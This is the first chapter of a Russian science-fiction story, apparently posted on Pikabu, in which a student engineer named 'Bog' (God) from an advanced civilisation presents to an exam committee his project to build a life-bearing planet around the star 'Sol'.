[моё] Рубль Цифровой рубль Новый рубль Длиннопост Денежные знаки
31
1
Shopisets
1 день назад
Сообщество фантастов

Создатель⁠⁠

Глава 1. Комиссия

Институт «Вселенная» был древнейшим из всех существующих. Его направление «Созидание» считалось самым сложным и престижным. Выпускники-созидатели строили миры - бесчисленное количество планет, на многих из них им удавалось развить жизнь. Но повторить главный шедевр - человечество - не мог пока никто.

В пустоте космоса, озарённая яркой вспышкой, возникла громада корабля. Его диаметр достигал трех километров, а форма и размер постоянно менялись, подстраиваясь под внешние условия. Сферический корпус переливался всеми цветами радуги. На борту этого чуда техники находились выпускники института. Разные кафедры готовы были принимать экзамены. Но особое внимание всегда уделялось будущим инженерам-создателям, кафедры «Созидания».

В центре скромной каюты стоял черный прямоугольный модуль со стеклянным куполом. Внутри, в состоянии «осознанного» криосна, пребывал один из студентов. Он любил эту опцию - она позволяла тренировать владение временем. Люди его цивилизации давно воспринимали время как инструмент. Они могли совершать временные скачки, чтобы точнее прогнозировать результаты своих творений. Но для настоящего мастерства нужны тренировки. В криосне инженер проживал целые галактические эпохи, сжимая миллиарды лет в мгновения собственного сознания.

Стеклянный купол растворился на атомы. Студент мгновенно пришел в себя и поднялся на ноги. Осмотрев каюту с многочисленными панелями вместо стен, он подошел к одной из них, слегка склонил голову - и панель исчезла. Форма будущего выпускника мгновенно обволокла его тело, а на месте панели возникло зеркало. В отражении стоял высокий мужчина в строгом черном комбинезоне. На вид ему было лет двадцать пять, с идеально бритой головой и аккуратной бородкой. Его глаза были скрыты за стёклами визоров, в которых мерцали отражения всего вокруг. Он, как и все его современники, жил в полном симбиозе с технологиями. Мириады нанороботов, каждый размером с несколько атомов, пронизывали его тело с самого рождения, отвечая за защиту, питание, знания и даже эмоции. Он провел ладонью по голове, и роботы усилили ощущение, вызвав приятное покалывание. Все работало идеально.

В сознании прозвучал мягкий женский голос: «Вас ожидают в главном зале».

Студент повернулся к стене, где уже материализовался список помещений. Название «Главный зал» было подсвечено. Обычно он предпочел бы прогуляться пешком, ему нравилось любоваться интерьерами корабля, но сейчас время не терпело. Легкое касание, и панель растворилась. Студент шагнул вперед и замер в ожидании. Он точно знал, что сейчас речь пойдет о его имени и мысленно улыбался. Его имя всегда вызывало лёгкое недоумение. Кто-то считал его странным, кто-то - архаичным, отсылающим к каким-то забытым мифам. Но для него в этом слове не было никакого сакрального смысла. Просто короткое, резкое и запоминающееся сочетание звуков.

Главный зал был оформлен скромно, но уютно. Приглушенный желтый свет успокаивал, а стены, отделанные под шероховатое дерево, источали тепло. У дальней стены за массивным столом выстроилась экзаменационная комиссия из семи человек.

Слева сидел низкорослый старик, что-то яростно ища в поверхности стола и противно цокая зубами. Рядом с ним - улыбчивый мужчина в официальной одежде, с оценивающим взглядом. Во главе стола восседал главный преподаватель кафедры, его наставник. Рядом с ним женщина вела протокол с помощью легких жестов и силы мысли. Вокруг её головы парило тонкое кольцо-интерфейс. Она не отрывалась от голографических данных. Справа от наставника замер робот со стальным, идеально гладким телом, а рядом с ним - темноволосая женщина, внимательно разглядывавшая вошедшего. Последний член комиссии прятался в тени.

- А вот и наш главный претендент, - произнёс сидящий в центре. Его взгляд пересёкся с взглядом студента, было видно, что они знакомы давно.

Улыбчивый мужчина в костюме оживился:

- Что ж, уважаемый, как вас там…, - он начал листать невидимые страницы в столе.

- Бог. Меня зовут Бог, преподаватель И́гнис, - четко ответил студент.

- Ах, точно! - всплеснул руками Игнис, - Бог! - лицо преподавателя озарилось улыбкой, - Ваши родители покопались в древних текстах? Редко кто берёт имена из эпохи «досимбиоза». Это же какая-то мифологическая фигура, кажется? Вроде... персонажа примитивных верований?

- Возможно, - студент позволил себе улыбнуться, но тут же снова стал серьёзен, - Для меня это просто имя.

- Что ж, начну с главного вопроса, - сказал главный экзаменатор.

Он движением руки извлек из стола трехмерную голограмму и отправил её в центр зала. В центре изображения мерцала маленькая желтая точка:

- Расскажите нам основную идею вашей работы.

- Хорошо, - кивнул студент и направился к желтой точке, - это звезда в одном из рукавов галактики, где мы сейчас находимся. Официального названия у нее пока нет, мы называем ее «Сол». Звезда относительно некрупная, но ее параметры идеально подходят для создания планеты на орбите с возможностью зарождения жизни. Причём жизни, идентичной нашей.

Его перебил старик с левого края стола:

- То есть вы намерены создать условия, в точности повторяющие наши? И они будут выглядеть как мы?

- Совершенно верно. Они будут выглядеть как люди «дотехно-симбиозной» эры.

Старик снова цокнул зубами:

- Кхм… Другими словами, по нашему образу и подобию. Но пока никому не удавалось избежать отклонений, - он резко замолчал.

- На этот раз всё будет иначе, преподаватель Нау́р. Мы используем новые методы планетостроения, идеальную звезду и кометы с ресурсами, идентичными нашей родной Ди-онодре.

После небольшой паузы главный экзаменатор поднялся:

- Мы изучили ваши расчёты и готовы допустить к сдаче экзамена. Но учтите, что именно за вашим проектом, мы будем внимательно следить, так как он кардинально отличается от всех подобных.

Слово взял человекоподобный робот. Его стальной голос прозвучал спокойно и размеренно:

- С данного момента вы получаете в распоряжение «Планетарный строитель», ресурсные комбайны и орбитальную базу «П.Л.У.Т.О.Н» - Пункт логистики и управления технологиями общего назначения. Она замаскирована под карликовую планету. Поскольку вы намерены воссоздать человечество, идентичное нашему, то контроль будет осуществляться через эту базу. О биологической части расскажет коллега.

- Благодарю, Мéркур, - кивнула темноволосая женщина, - Вам выдается одна «протоклетка». Если не справитесь, и жизнь не зародится, мы предоставим ещё одну, но с потерей балла. Всего у вас пять попыток. Провал пятой означает дополнительные временные занятия и возможность пересдачи только через… - она замерла, снова листая данные.

Студент мягко прервал её:

- Я прекрасно понимаю последствия провала и уверен, что всё просчитал правильно. Эта работа заняла почти всё время моего обучения.

Главный экзаменатор протянул ему руку:

- В таком случае, приступайте, инженер. Удачи вам!

- Спасибо, Вели́р. Спасибо всем членам комиссии, - он крепко пожал руку.

После того, как студент покинул зал, с правого конца стола, из тени, донёсся низкий хриплый голос:

- Сверхсложная задача для экзамена. Звезда, которую он выбрал, нестабильна. Метеоритные атаки будут слишком частыми.

- В этом и есть суть экзамена, Тунне́п, - парировал Велир, - Он должен создать не просто планету, а устойчивую систему. Хотя признаю - задача более чем сложная.

- Именно что сложная, - продолжил теневой голос, - Этому юнцу придется создавать целую систему планет. Как вы сказали, называется звезда?

- «Сол».

- «Соооол»…, - тихо протянул невидимка, - Знаете коллеги, в звездах много силы. Вы же помните Нау́р, как будет «сила» на древнем?

Старик Наур, снова цокнув:

- «Неси!», вы намекаете на «Сол-неси!» на одном из древних наречий будет звучать как…

- «Солнце», - спокойно произнес невидимка и его темная фигура наклонилась вперед. В полумраке стало видно, как по поверхности его одежды бегут крошечные светящиеся точки, - Нашему студенту Богу предстоит построить целую Солнечную систему.


Если вас зацепило, то вы можете скачать полную книгу

Показать полностью
[моё] Фантастический рассказ Авторский мир Русская фантастика Самиздат Длиннопост
0
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Маркет Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии